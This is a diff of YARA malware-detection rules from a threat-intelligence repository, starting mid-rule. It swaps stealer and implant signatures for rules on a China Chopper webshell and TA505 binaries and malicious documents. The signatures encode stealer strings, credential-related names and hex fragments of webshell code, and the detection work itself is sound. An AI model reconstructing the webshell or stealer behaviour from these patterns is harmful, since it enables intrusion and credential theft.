"set_IsProcessElevated" fullword ascii + $s12 = "SELECT ExecutablePath, ProcessID FROM Win32_Process" fullword wide + $s13 = "<IsProcessElevated>k__BackingField" fullword ascii + $s14 = "System.Collections.Generic.IEnumerable<RedLine.Logic.Json.JsonValue>.GetEnumerator" fullword ascii + $s15 = "System.Collections.Generic.IEnumerator<RedLine.Logic.Json.JsonValue>.get_Current" fullword ascii + $s16 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\browser.exe" fullword wide + $s17 = "ProcessExecutablePath" fullword ascii + $s18 = "IsProcessElevated" fullword ascii + $s19 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\firefox.exe" fullword wide + $s20 = "get_encryptedPassword" fullword ascii condition: - uint32be(0)==0x504B0304 and filesize >300KB and 4 of them + uint16(0)==0x5a4d and filesize <90KB and 15 of them } -rule ARKBIRD_SOLG_MAL_Zstealer_Nov_2021_1 : FILE +rule ARKBIRD_SOLG_APT_UNC2452_Webshell_Chopper_Mar_2021_1 : FILE { meta: - description = "Detect ZStealer stealer used by Void Balaur group" + description = "Detect exploit listener in the exchange configuration for Webshell Chopper used by UNC2452 group" author = "Arkbird_SOLG" - id = "0282884b-569a-5e46-a6ad-d2776ff71ddb" - date = "2021-11-11" - modified = "2021-11-12" - reference = "https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-11/Void_Balaur/MAL_ZStealer_Nov_2021_1.yara#L1-L19" + id = "174af8e1-0df0-5ad7-ac7d-a208f64cb765" + date = "2021-03-07" + modified = "2021-03-07" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-07/UNC2452/APT_UNC2452_Webshell_Chopper_Mar_2021_1.yar#L1-L26" license_url = "N/A" - logic_hash = "c3bec4fb8338ad71577e63f81c22b5d250083f2475f60610de8dccd4979035d3" + logic_hash = "77bd7e5c10aa9cf2b407b37a76954b4eed163e36653e1fb3cde5de853f824cf0" + score = 75 + quality = 73 + tags = "FILE" + + strings: + $l1 = { 20 68 74 74 70 3a 2f 2f ?? 2f 3c 73 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 22 63 23 22 20 72 75 6e 61 74 3d 22 73 65 72 76 65 72 22 3e 76 6f 69 64 20 50 61 67 65 5f 4c 6f 61 64 28 6f 62 6a 65 63 74 20 73 65 6e 64 65 72 2c 20 45 76 65 6e 74 41 72 67 73 20 65 29 7b 69 66 20 28 52 65 71 75 65 73 74 2e 46 69 6c 65 73 2e 43 6f 75 6e 74 21 3d 30 29 20 7b 20 52 65 71 75 65 73 74 2e 46 69 6c 65 73 5b 30 5d 2e 53 61 76 65 41 73 28 53 65 72 76 65 72 2e 4d 61 70 50 61 74 68 28 22 [5-14] 22 29 29 3b 7d 7d 3c 2f 73 63 72 69 70 74 3e } + $l2 = { 68 74 74 70 3a 2f 2f ?? 2f 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 20 72 75 6e 61 74 3d 22 73 65 72 76 65 72 22 3e 66 75 6e 63 74 69 6f 6e 20 50 61 67 65 5f 4c 6f 61 64 28 29 7b 65 76 61 6c 28 [-] 2c 22 75 6e 73 61 66 65 22 29 3b 7d 3c 2f 73 63 72 69 70 74 3e } + $c1 = { 5c 4f 41 42 20 28 44 65 66 61 75 6c 74 20 57 65 62 20 53 69 74 65 29 } + $c2 = "ExternalUrl" fullword ascii + $c3 = { 49 49 53 3a 2f 2f [10-30] 2f 57 33 53 56 43 2f [1-3] 2f 52 4f 4f 54 2f 4f 41 42 } + $c4 = "FrontEnd\\HttpProxy\\OAB" fullword ascii + $c5 = "/Configuration/Schema/ms-Exch-OAB-Virtual-Directory" fullword ascii + + condition: + filesize >1KB and 1 of ($l*) and 3 of ($c*) +} +import "pe" + +rule ARKBIRD_SOLG_TA505_Bin_21Nov_1 : FILE +{ + meta: + description = "module1.bin" + author = "Arkbird_SOLG" + id = "2f23653e-5158-5a64-86ee-a58048780661" + date = "2019-11-21" + modified = "2019-11-21" + reference = "https://twitter.com/58_158_177_102/status/1197432303057637377" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L3-L30" + license_url = "N/A" + logic_hash = "133f202300a9e0428d20ce76bc832cf45cb5dacb05e39c21130d8d5cc39446ba" score = 75 quality = 75 tags = "FILE" - hash1 = "af89d85a3b579ac754850bd6e52e7516c2e63141107001463486cd01bc175052" - hash2 = "5a2c9060f6cc1e6e0fd09b2b194631d2c7e7f024d9e2d3a9be64570e263f565f" - tlp = "white" - adversary = "Void Balaur" + hash1 = "bfe610790d41091c37ae627472f5f8886357e713945ca8a5e2b56cd6c791f989" strings: - $s1 = { 53 33 c0 55 68 71 d3 46 00 64 ff 30 64 89 20 a1 80 7f 7b 00 8b 10 ff 52 44 a1 84 7f 7b 00 8b 10 ff 52 44 8d 45 fc 50 68 80 d3 46 00 68 02 00 00 80 e8 e3 a3 f9 ff 85 c0 0f 85 94 01 00 00 8d 45 f8 ba 00 10 00 00 e8 86 83 f9 ff c7 45 f0 00 10 00 00 33 db e9 49 01 00 00 8d 45 f4 50 6a 00 8d 45 f8 e8 36 82 f9 ff 8d 55 e8 e8 e6 cd f9 ff 8b 4d e8 8d 45 ec ba bc d3 46 00 e8 12 80 f9 ff 8b 55 ec b9 fc d3 46 00 b8 02 00 00 80 e8 d4 d8 ff ff 84 c0 0f 84 01 01 00 00 8d 55 e4 8b 45 f4 e8 c5 c0 f9 ff 8b 55 e4 8d 45 f4 e8 6e 7d f9 ff 8b 55 f4 b8 14 d4 46 00 e8 cd 82 f9 ff 85 c0 7e 32 8d 45 e0 50 8b 55 f4 b8 14 d4 46 00 e8 b8 82 f9 ff 8b c8 83 c1 03 ba 01 00 00 00 8b 45 f4 e8 c2 81 f9 ff 8b 55 e0 a1 80 7f 7b 00 8b 08 ff 51 38 eb 0d 8b 55 f4 a1 80 7f 7b 00 8b 08 ff 51 38 8d 45 f4 50 6a 00 8d 45 f8 e8 90 81 f9 ff 8d 55 d8 e8 40 cd f9 ff 8b 4d d8 8d 45 dc ba bc d3 46 00 e8 6c 7f f9 ff 8b 55 dc b9 24 d4 46 00 b8 02 00 00 80 e8 2e d8 ff ff 84 c0 74 42 8d 45 f8 } - $s2 = { 8b d9 88 55 fb 89 45 fc 33 c0 55 68 b3 2e 46 00 64 ff 30 64 89 20 33 d2 8b 45 fc e8 a0 11 fa ff b2 01 a1 2c 74 41 00 e8 94 11 fa ff 8b 55 fc 89 42 0c 8b 45 fc c6 40 08 00 33 c0 89 45 f4 33 d2 55 68 96 2e 46 00 64 ff 32 64 89 22 8d 45 f0 89 5d ec 8b 55 ec e8 9e 21 fa ff 8b 45 fc 83 c0 04 50 8b 45 f0 e8 b7 25 fa ff 50 e8 2d f5 ff ff 83 c4 08 85 c0 74 66 8b 45 fc 8b 40 04 85 c0 74 39 50 e8 26 f5 ff ff 59 89 45 f4 89 5d dc c6 45 e0 0b 8b 45 f4 89 45 e4 c6 45 e8 06 8d 45 dc 50 6a 01 b9 e4 2e 46 00 b2 01 a1 58 2c 46 00 e8 be a1 fa ff e8 9d 19 fa ff eb 23 89 5d d4 c6 45 d8 0b 8d 45 d4 50 6a 00 b9 10 2f 46 00 b2 01 a1 58 2c 46 00 e8 99 a1 fa ff e8 78 19 fa ff 33 c0 5a 59 59 64 89 10 68 9d 2e 46 00 83 7d f4 00 74 0a 8b 45 f4 50 e8 c4 f4 ff ff } - $s3 = { 68 1d c7 45 00 64 ff 30 64 89 20 8b c3 e8 d8 89 fa ff 8d 45 fc ba 00 01 00 00 e8 17 90 fa ff c7 45 f8 ff 00 00 00 8d 45 f8 50 8d 45 fc e8 d0 8e fa ff 50 e8 f6 af fa ff c7 45 f4 ff 00 00 00 c7 45 f0 ff 00 00 00 8d 45 ec 50 8d 45 f0 50 8d 85 ec fd ff ff 50 8d 45 f4 50 8d 85 ec fe ff ff 50 8d 45 fc e8 9a 8e fa ff 50 6a 00 e8 d6 af fa ff 85 c0 0f 84 6d 01 00 00 8d 85 ec fe ff ff 50 e8 ba af fa ff 85 c0 0f 84 59 01 00 00 8d 85 ec fe ff ff 50 e8 7e af fa ff 8b f0 8d 85 ec fe ff ff 50 e8 80 af fa ff 0f b6 38 8b c3 ba 34 c7 45 00 e8 89 89 fa ff 80 3e 00 75 } - $s4 = { a1 9c c2 49 00 8b 00 e8 e3 82 01 00 8b 93 88 01 00 00 8b 08 ff 51 54 8b f8 85 ff 7c 15 a1 9c c2 49 00 8b 00 e8 c6 82 01 00 8b d7 8b 08 ff 51 18 8b f0 6a 01 56 e8 e1 f2 fc ff 8b c3 e8 be 17 00 00 8a 93 84 01 00 00 e8 2f 61 00 00 33 c0 5a 59 59 } - $s5 = { 45 72 72 6f 72 20 5b 25 64 5d 3a 20 25 73 2e 0d 22 25 73 22 3a 20 25 73 00 00 ff ff ff ff 0a 00 00 00 4e 6f 20 6d 65 73 73 61 67 65 } + $s1 = "intc.dll" fullword ascii + $s2 = "?%?2?7?=?" fullword ascii + $s3 = "Is c++ not java" fullword ascii + $s4 = "4%5K5e5l5p5t5x5|5" fullword ascii + $s5 = "KdaMt$" fullword ascii + $s6 = ";*;9;Z;`;" fullword ascii + $s7 = "<*<4<?<I<S<Y<" fullword ascii + $s8 = "0'040A0K0U0]0k0" fullword ascii + $s9 = "3 3(30363>3M3_3" fullword ascii + $s10 = ": :9:A:F:R:W:t:z:" fullword ascii + $s11 = "5'5,585@5H5P5f5n5v5~5" fullword ascii + $s12 = "<,<2<:<@<h<n<" fullword ascii + $s13 = "8+808:8T8b8j8p8" fullword ascii + $s14 = "8!9<9K9g9o9z9" fullword ascii + $s15 = ">(>6>D>N>U>f>p>" fullword ascii + $s16 = ":!:,:>:J:X:^:c:i:v:" fullword ascii condition: - uint16(0)==0x5a4d and filesize >300KB and all of them + uint16(0)==0x5a4d and filesize <900KB and (pe.imphash()=="642f4619fb2d93cb205c65c2546516ca" and pe.exports("intc") or 8 of them ) } -rule ARKBIRD_SOLG_MAL_Windealer_Oct_2021_2 : FILE +import "pe" + +rule ARKBIRD_SOLG_TA505_Bin_21Nov_2 : FILE { meta: - description = "Detect modules from WinDealer implant" + description = "vspub1.bin" author = "Arkbird_SOLG" - id = "3cca1fa1-2651-5a93-bef1-d32a7b5be4c9" - date = "2021-10-30" - modified = "2021-10-31" - reference = "https://blogs.jpcert.or.jp/en/2021/10/windealer.html" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-30/WinDealer/MAL_WinDealer_Oct_2021_2.yara#L1-L19" + id = "2bbd1d3a-50ab-5c6a-97fe-60b5a86e8d18" + date = "2019-11-21" + modified = "2019-11-21" + reference = "https://twitter.com/58_158_177_102/status/1197432303057637377" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L32-L50" license_url = "N/A" - logic_hash = "c2fb5697dcdb34e0fb3e2dbd2df05748eddc2796c253e90503372eb73c475fab" + logic_hash = "43fb83abdeb1a31da836b4cf99dcda269f6d005cbb8eb2d845498d2c589574e1" score = 75 quality = 75 tags = "FILE" - hash1 = "0c365d9730a10f1a3680d24214682f79f88aa2a2a602d3d80ef4c1712210ab07" - hash2 = "2eef273af0c768b514db6159d7772054d27a6fa8bc3d862df74de75741dbfb9c" - tlp = "white" - adversary = "LuoYu" + hash1 = "54cc27076793d5de064813c61d52452d42f774d24b3859a63002d842914fd9cd" strings: - $s1 = { 81 ec f0 03 00 00 53 55 8b d9 56 8d 44 24 0c 57 8d 4c 24 18 50 51 c7 44 24 18 f4 01 00 00 ff 15 0c [2] 10 85 c0 0f 85 ?? 01 00 00 68 [3] 10 } - $s2 = { 81 ec 24 03 00 00 53 56 8d 44 24 18 57 50 68 03 01 00 00 6a 00 68 [2] 03 10 68 01 00 00 80 c7 44 24 20 00 00 00 00 ff 15 10 [2] 10 85 c0 0f 85 ?? 01 00 00 8d 4c 24 0c 8d 54 24 20 51 52 8b 1d 00 [2] 10 50 68 3f 01 0f 00 50 50 50 8b 44 24 38 68 [2] 03 10 50 ff d3 85 c0 0f 85 ?? 01 00 00 8d 4c 24 0c 8d 54 24 10 51 52 50 68 3f 01 0f 00 50 50 50 8b 44 24 3c 68 [2] 03 10 50 ff d3 85 c0 0f 85 ?? 01 00 00 bf [2] 03 10 83 c9 ff f2 ae f7 d1 2b f9 8d ?? 24 } - $s3 = "%s\\%s\\V5_History.dat" wide - $s4 = { 8b 8c 24 2c 02 00 00 8b 94 24 28 02 00 00 55 57 51 52 8d 44 24 24 53 50 89 74 24 2c e8 05 fb ff ff b9 41 00 00 00 33 c0 8d bc 24 34 01 00 00 83 c4 18 f3 ab 8d 8c 24 1c 01 00 00 51 68 04 01 00 00 ff 15 [2] 03 10 b9 41 00 00 00 33 c0 8d 7c 24 18 50 f3 ab [3] 01 } - $s5 = { 56 6a 10 e8 [3] 00 8b f0 85 f6 74 3a 8b 4c 24 0c 8d 46 04 85 c9 c7 06 [3] 10 c7 00 00 00 00 00 50 74 11 8b 44 24 0c 50 e8 [3] 00 89 46 08 8b c6 5e c3 8b 4c 24 0c 51 e8 [3] 00 89 46 08 8b c6 5e c3 33 } + $s1 = "glColor.dll" fullword ascii + $s2 = "{sysdir}\\nvu*.exe" fullword ascii + $s3 = "KLSUIrhekheirguhemure" fullword ascii + $s4 = "tEo>qM" fullword ascii + $s5 = "?\"?0?8?>?I?V?^?l?q?v?{?" fullword ascii + $s6 = ";\";0;d;" fullword ascii + $s7 = "T0p0v0|0" fullword ascii condition: - uint16(0)==0x5A4D and filesize >80KB and 4 of ($s*) + uint16(0)==0x5a4d and filesize <900KB and (pe.imphash()=="ff6dd5f31dd7c538ebc02542f09f4280" and pe.exports("setColor") or all of them ) } -rule ARKBIRD_SOLG_MAL_Windealer_Oct_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_TA505_Maldoc_21Nov_1 : FILE { meta: - description = "Detect WinDealer implant" + description = "invitation.doc" author = "Arkbird_SOLG" - id = "7ffece8a-b56a-5893-a135-3001c0327f66" - date = "2021-10-30" - modified = "2021-10-31" - reference = "https://blogs.jpcert.or.jp/en/2021/10/windealer.html" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-30/WinDealer/MAL_WinDealer_Oct_2021_1.yara#L1-L19" + id = "10562979-0b90-5752-89b8-f0d35121df41" + date = "2019-11-21" + modified = "2019-11-21" + reference = "https://twitter.com/58_158_177_102/status/1197432303057637377" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L52-L83" license_url = "N/A" - logic_hash = "b6211274a0ffa55723d3c34763540278197507b4bd4b853249e16501a3aa5acb" + logic_hash = "7d2cbc0a505c245aa3e9e8a76cebc7ea7dbd4bd3be26a858f731b96791293ba5" score = 75 - quality = 71 + quality = 50 tags = "FILE" - hash1 = "1e9fc7f32bd5522dd0222932eb9f1d8bd0a2e132c7b46cfcc622ad97831e6128" - hash2 = "b9f526eea625eec1ddab25a0fc9bd847f37c9189750499c446471b7a52204d5a" - tlp = "white" - adversary = "LuoYu" + hash1 = "a197c6de8734044c441438508dd3ce091252de4f98df2016b006a1c963c02505" strings: - $s1 = { 8b ec 81 ec 64 03 00 00 53 56 33 db 6a 64 8d 45 9c 53 50 e8 [2] 00 00 be 00 01 00 00 8d 85 9c fc ff ff 56 53 50 e8 [2] 00 00 56 8d 85 9c fd ff ff 53 50 e8 [2] 00 00 56 8d 85 9c fe ff ff 53 50 e8 [2] 00 00 83 c4 30 8d 45 9c 6a 64 50 ff 15 [2] 41 00 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 ff 75 9c e8 [2] ff ff 83 c4 10 38 9d 9c fe ff ff 5e 5b 75 20 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 ff 75 9c e8 [2] ff ff 83 c4 10 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 68 [2] 41 00 ff 75 08 ff 15 [2] 41 00 83 c4 14 6a } - $s2 = { 8b ec b8 40 1c 00 00 e8 [2] 00 00 56 57 33 ff 68 [2] 41 00 89 7d f8 ff 15 [2] 41 00 8b f0 6a 32 8d 45 c0 57 50 e8 [2] 00 00 83 c4 10 3b f7 74 1c 6a 5c 56 ff 15 [2] 41 00 59 3b c7 59 74 0d 40 50 8d 45 c0 50 e8 [2] 00 00 59 59 be 00 04 00 00 8d 85 c0 f7 ff ff 56 57 50 89 75 fc e8 [2] 00 00 8d 45 fc 50 8d 85 c0 f7 ff ff 50 e8 fb fd ff ff 83 c4 14 39 7d fc 75 24 56 8d 85 c0 f7 ff ff 57 50 89 75 fc e8 [2] 00 00 8d 45 fc 50 8d 85 c0 f7 ff ff 50 e8 ?? fc ff ff 83 c4 14 56 8d 85 c0 fb ff ff 57 50 e8 [2] 00 00 8d 85 c0 fb ff ff 50 e8 [2] 00 00 8d 85 c0 fb ff ff 50 e8 [2] 00 00 83 c4 14 83 7d fc 0a 7e 3e 83 f8 0a 7e 6d 8d 45 c0 50 8d 85 c0 fb ff ff 50 8d 85 c0 f7 ff ff 50 8d 85 c0 e3 ff ff 68 [2] 41 00 50 ff 15 [2] 41 00 50 8d 85 c0 e3 ff ff 50 e8 4d fd ff ff 83 c4 1c 89 45 f8 eb 5c 83 f8 0a 7e 2f 8d 45 c0 50 8d 85 c0 fb ff ff 50 8d 85 c0 e3 ff ff 68 [2] 41 00 50 ff 15 [2] 41 00 50 8d 85 c0 e3 ff ff 50 e8 16 fd ff ff 83 c4 18 eb c7 6a 43 8d 45 f4 68 [2] 41 00 50 ff 15 [2] 41 00 83 c4 0c 8d 45 f8 57 57 57 57 50 57 8d 45 f4 57 50 ff 15 [2] 41 00 8b 45 f8 } - $s3 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4e 65 74 77 6f 72 6b 5c 7b 34 44 33 36 45 39 37 32 2d 45 33 32 35 2d 31 31 43 45 2d 42 46 43 31 2d 30 38 30 30 32 42 45 31 30 33 31 38 7d 5c 25 73 5c 43 6f 6e 6e 65 63 74 69 6f 6e } - $s4 = { 6d 61 63 3a 20 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 } - $s5 = { 8b d8 59 85 db 59 74 57 56 e8 [2] 00 00 03 d8 53 ff 15 [2] 41 00 6a 00 50 e8 [2] ff ff 6a 64 8d 45 9c 6a 00 50 e8 [2] 00 00 83 c4 1c 8d 45 9c 68 [2] 41 00 68 [2] 41 00 50 ff 15 [2] 41 00 66 8b 8f d2 07 00 00 51 8a 8f d0 07 00 00 51 50 8d 45 9c 50 e8 ?? f1 ff ff 83 c4 1c 5f 5e 33 c0 5b c9 c3 55 } + $x1 = "C:\\Users\\J\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\basecamp" fullword wide + $x2 = "*\\G{42DC991A-7E1B-4254-B210-CDD3DDCFD365}#2.0#0#C:\\Users\\1\\AppData\\Local\\Temp\\VBE\\MSForms.exd#Microsoft Forms 2.0 Object" wide + $x3 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide + $x4 = "C:\\Users\\J\\AppData\\Local\\Temp\\basecamp" fullword wide + $s5 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide + $s6 = "*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual" wide + $s7 = "glColor.dll" fullword ascii + $s8 = "magne.dll" fullword ascii + $s9 = "InitScope.dll" fullword wide + $s10 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" fullword wide + $s11 = "CopyFiles=@EP0NGJ8D.GPD,@EP0NGN8D.GPD,@EP0NGX8D.GPD,@EP0NCJ8D.CMB,@EP0NOJ8D.DXT,@EP0NOE10.DLL,@EP0NM4RC.DLL,@EP0NRE8D.DLL" fullword wide + $s12 = "CopyFiles=@EP0NGJ8C.GPD,@EP0NGN8C.GPD,@EP0NGX8C.GPD,@EP0NCJ8C.CMB,@EP0NOJ8C.DXT,@EP0NOE09.DLL,@EP0NM4RB.DLL,@EP0NRE8C.DLL" fullword wide + $s13 = "vspub2.dll-" fullword ascii + $s14 = "pictarget" fullword ascii + $s15 = "Public Declare Function ZooDcom Lib \"vspub1.dll\" Alias \"IKAJSL\" () As Integer" fullword ascii + $s16 = "\"Epson\"=\"http://go.microsoft.com/fwlink/?LinkID=36&prd=10798&sbp=Printers\"" fullword wide + $s17 = "EP0NM4RC.DLL = 1" fullword wide + $s18 = "EP0NOE10.DLL = 1" fullword wide + $s19 = "EP0NRE8C.DLL = 1" fullword wide + $s20 = "EP0NM4RB.DLL = 1" fullword wide condition: - uint16(0)==0x5A4D and filesize >80KB and 4 of ($s*) + uint16(0)==0xcfd0 and filesize <3000KB and 1 of ($x*) and 4 of them } -rule ARKBIRD_SOLG_APT_APT_C_23_Micropsia_Mar_2021_2 : FILE +import "pe" + +rule ARKBIRD_SOLG_TA505_Maldoc_21Nov_2 : FILE { meta: - description = "Detect Micropsia used by APT-C-23 (Build 2020)" + description = "invitation (1).xls" author = "Arkbird_SOLG" - id = "cdd95b35-09b4-5412-bd86-55c2e7523d3e" - date = "2021-03-31" - modified = "2021-03-31" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-31/APT-C-23/APT_APT_C_23_Micropsia_Mar_2021_2.yar#L1-L26" + id = "e6328342-0d08-58a3-befe-15de41649763" + date = "2019-11-21" + modified = "2019-11-21" + reference = "https://twitter.com/58_158_177_102/status/1197432303057637377" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L85-L116" license_url = "N/A" - logic_hash = "a00091161ec69c9885e983117e2b424f860bfbab2551ea23b74c37fc062850b9" - score = 50 + logic_hash = "84c7f064fb813934e397d81dad8af6288cb919e046cd2bb16f9ca6dc348c43c2" + score = 75 quality = 75 tags = "FILE" - hash1 = "d9b938d89a13620aabe81e0a9d02778cad8658cbfd6f15e7dab47b1118b53237" - hash2 = "42f40fb2e4f971807fcb771c9aacc5a2361fdcdaf3eaafc31b22096d81dd0666" - level = "experimental" + hash1 = "270b398b697f10b66828afe8d4f6489a8de48b04a52a029572412ae4d20ff89b" strings: - $code1 = { 8d 45 f8 8b 15 90 c7 69 00 e8 1e 05 d5 ff c7 45 d0 00 00 00 00 c7 45 d4 00 00 00 00 8b 45 d8 8b 58 5c 85 db 74 22 8b c3 8b 10 ff 12 52 50 8b 45 d8 8b 40 5c e8 af 4b db ff 29 04 24 19 54 24 04 58 5a 89 45 d0 89 55 d4 6a 04 8d 45 d8 50 6a 2d 8b 45 d8 8b 80 a4 00 00 00 50 e8 59 cd ff ff c7 45 c4 02 00 00 00 6a 04 8d 45 c4 50 6a 3f 8b 45 d8 8b 80 a4 00 00 00 50 e8 3b cd ff ff c7 45 c4 01 00 00 00 6a 04 8d 45 c4 50 6a 3f 8b 45 d8 8b 80 a4 00 00 00 50 e8 1d cd ff ff 33 c0 5a 59 59 64 89 10 68 aa df 6b 00 8b 45 e8 e8 a0 } - $code2 = { 6a 00 8b 45 d0 50 6a 00 6a 00 6a 00 6a 00 8b 45 d8 8b 80 a4 00 00 00 50 e8 d1 cc ff ff 85 c0 75 19 8b 15 50 a7 6e 00 8b 4d e8 8b 45 ec e8 9c fc } - $code3 = { 8d 4d f4 8b 45 d4 8b 40 0c ba 01 00 00 00 8b 18 ff 53 0c 8b 45 d4 8b 50 10 a1 bc 1c 6f 00 e8 82 bc ff ff 8b 55 f4 a1 bc 1c 6f 00 e8 75 bc ff ff 8b 45 f4 ba f4 7c 6d 00 e8 a0 4c d3 ff 0f 85 cf 00 00 00 ba 08 7d 6d 00 a1 bc 1c 6f 00 e8 53 bc ff ff 33 c0 55 68 9a 76 6d 00 64 ff 30 64 89 20 33 c0 89 45 dc 8d 55 9c b8 38 7c 6d 00 e8 7b 86 d5 ff ff 75 9c 68 50 7c 6d 00 8d 55 98 b8 09 00 00 00 e8 c6 c4 ff ff ff 75 98 68 60 7c 6d 00 8d 45 dc ba 04 00 00 00 e8 91 4b d3 ff e8 c4 22 d5 ff dd 5d c0 9b ff 75 c4 ff 75 c0 8d 4d e0 8b 15 30 ab 6e 00 b8 70 7c 6d 00 e8 97 32 d5 ff 8b 45 d4 83 c0 14 } - $s1 = { 4a 00 50 00 45 00 47 00 20 00 49 00 6d 00 61 00 67 00 65 00 20 00 46 00 69 00 6c 00 65 00 25 00 53 00 63 00 68 00 65 00 6d 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 72 00 65 00 67 00 69 00 73 00 74 00 65 00 72 00 65 00 64 00 20 00 66 00 6f 00 72 00 20 00 25 00 73 } - $s2 = "Download start ." fullword wide - $s3 = "application/x-msdownload" fullword wide - $s4 = "Start Download File" fullword wide - $s5 = "getHttpDownload" fullword ascii - $s6 = "Download start ." fullword wide - $s7 = "-start" fullword wide - $s8 = "-Winapi.ImageHlp" fullword ascii - $s9 = "postHttpDownload" fullword ascii + $x1 = "C:\\Users\\J\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\AFFA0BDC.tmp" fullword wide + $x2 = "C:\\Users\\J\\AppData\\Local\\Temp\\AFFA0BDC.tmp" fullword wide + $x3 = "C:\\Windows\\system32\\FM20.DLL" fullword ascii + $x4 = "C:\\Users\\J\\AppData\\Local\\Temp\\VBE\\MSForms.exd" fullword ascii + $x5 = "C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" fullword ascii + $x6 = "C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" fullword ascii + $x7 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide + $x8 = "*\\G{BA45F137-16B2-487D-9A21-F38179C0576C}#2.0#0#C:\\Users\\J\\AppData\\Local\\Temp\\VBE\\MSForms.exd#Microsoft Forms 2.0 Object" wide + $s9 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide + $s10 = "lIySgefa86jIfdEkSZVDoSs5BDkcalCieNBN4EqfVaEs2wWD4OjpTiOBqDrL3d9WCaDAKZpoJPRnoacfQPhucmy69axznNmRbRY12v3ez5PdAAnpAl5m5NUqKHBKCYb5" ascii + $s11 = "35mvkZ9ZvIttuHSTUKWZCdOsh5j4Y1p2pJ3vi5onOXnMcEPIUIK1UWAYq3noPeaDtAdUOxKYvIlNZbqMpJjqpxhCidfpQ9GJXStKA44w7UFlKV9oMK8f5Tn6tKMKsviw" ascii + $s12 = "*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual" wide + $s13 = "verkar.dll" fullword ascii + $s14 = "intc.dll" fullword ascii + $s15 = "YjAygups4wPzNU7lNIGBuFbv6Triw8rxEPLSjrYSKXdUV8QuzbwJvdHshfBvdh66er47iobvTX1FCqI8d6RuKRcBhsLdYCOC1hPEdTllabYHlcZ1FDsgyLuwoCZYM7Fq" ascii + $s16 = "MinuetsOs.dll" fullword wide + $s17 = "KaBYL8xLRpN7VMzibXEzxh2GetwfB6MY9k3dRCNncC5eiyKNTaTrcoUDi4TrLrkULX7KSvAHjrw4lXxPRSvBmvWUzz5WRwKTskBtBa4xIlhT1ZruGeI36SIqamksANYW" ascii + $s18 = "XmhvJDfd16Hxk6eRMKJ7sqYIVneFVN7iUzRF8or7LKNKW9bhf5a7V5OGwIIvyJrm8yMUoITytLvRMoVWm7z1NawYTkjzP5HbtBLxwp3GkLMjJ74iWVjBjzI8cWadyuRy" ascii + $s19 = "Sx3mdokmfv27AYhtFublOb5Exec1r1b5LAAbsRHrjLKTWiG4K9dKXbuQBxY9mt4nu7u9ygaWWTcczlRpGhpsXzgKgTI52IfZRxyZWHFD8pXd9sqqOJBedLy4ZT3OHe5n" ascii + $s20 = "C:\\Windows\\system32\\stdole2.tlb" fullword ascii condition: - uint16(0)==0x5a4d and filesize >50KB and 2 of ($code*) and 5 of ($s*) + uint16(0)==0xcfd0 and filesize <5000KB and 1 of ($x*) and 4 of them } 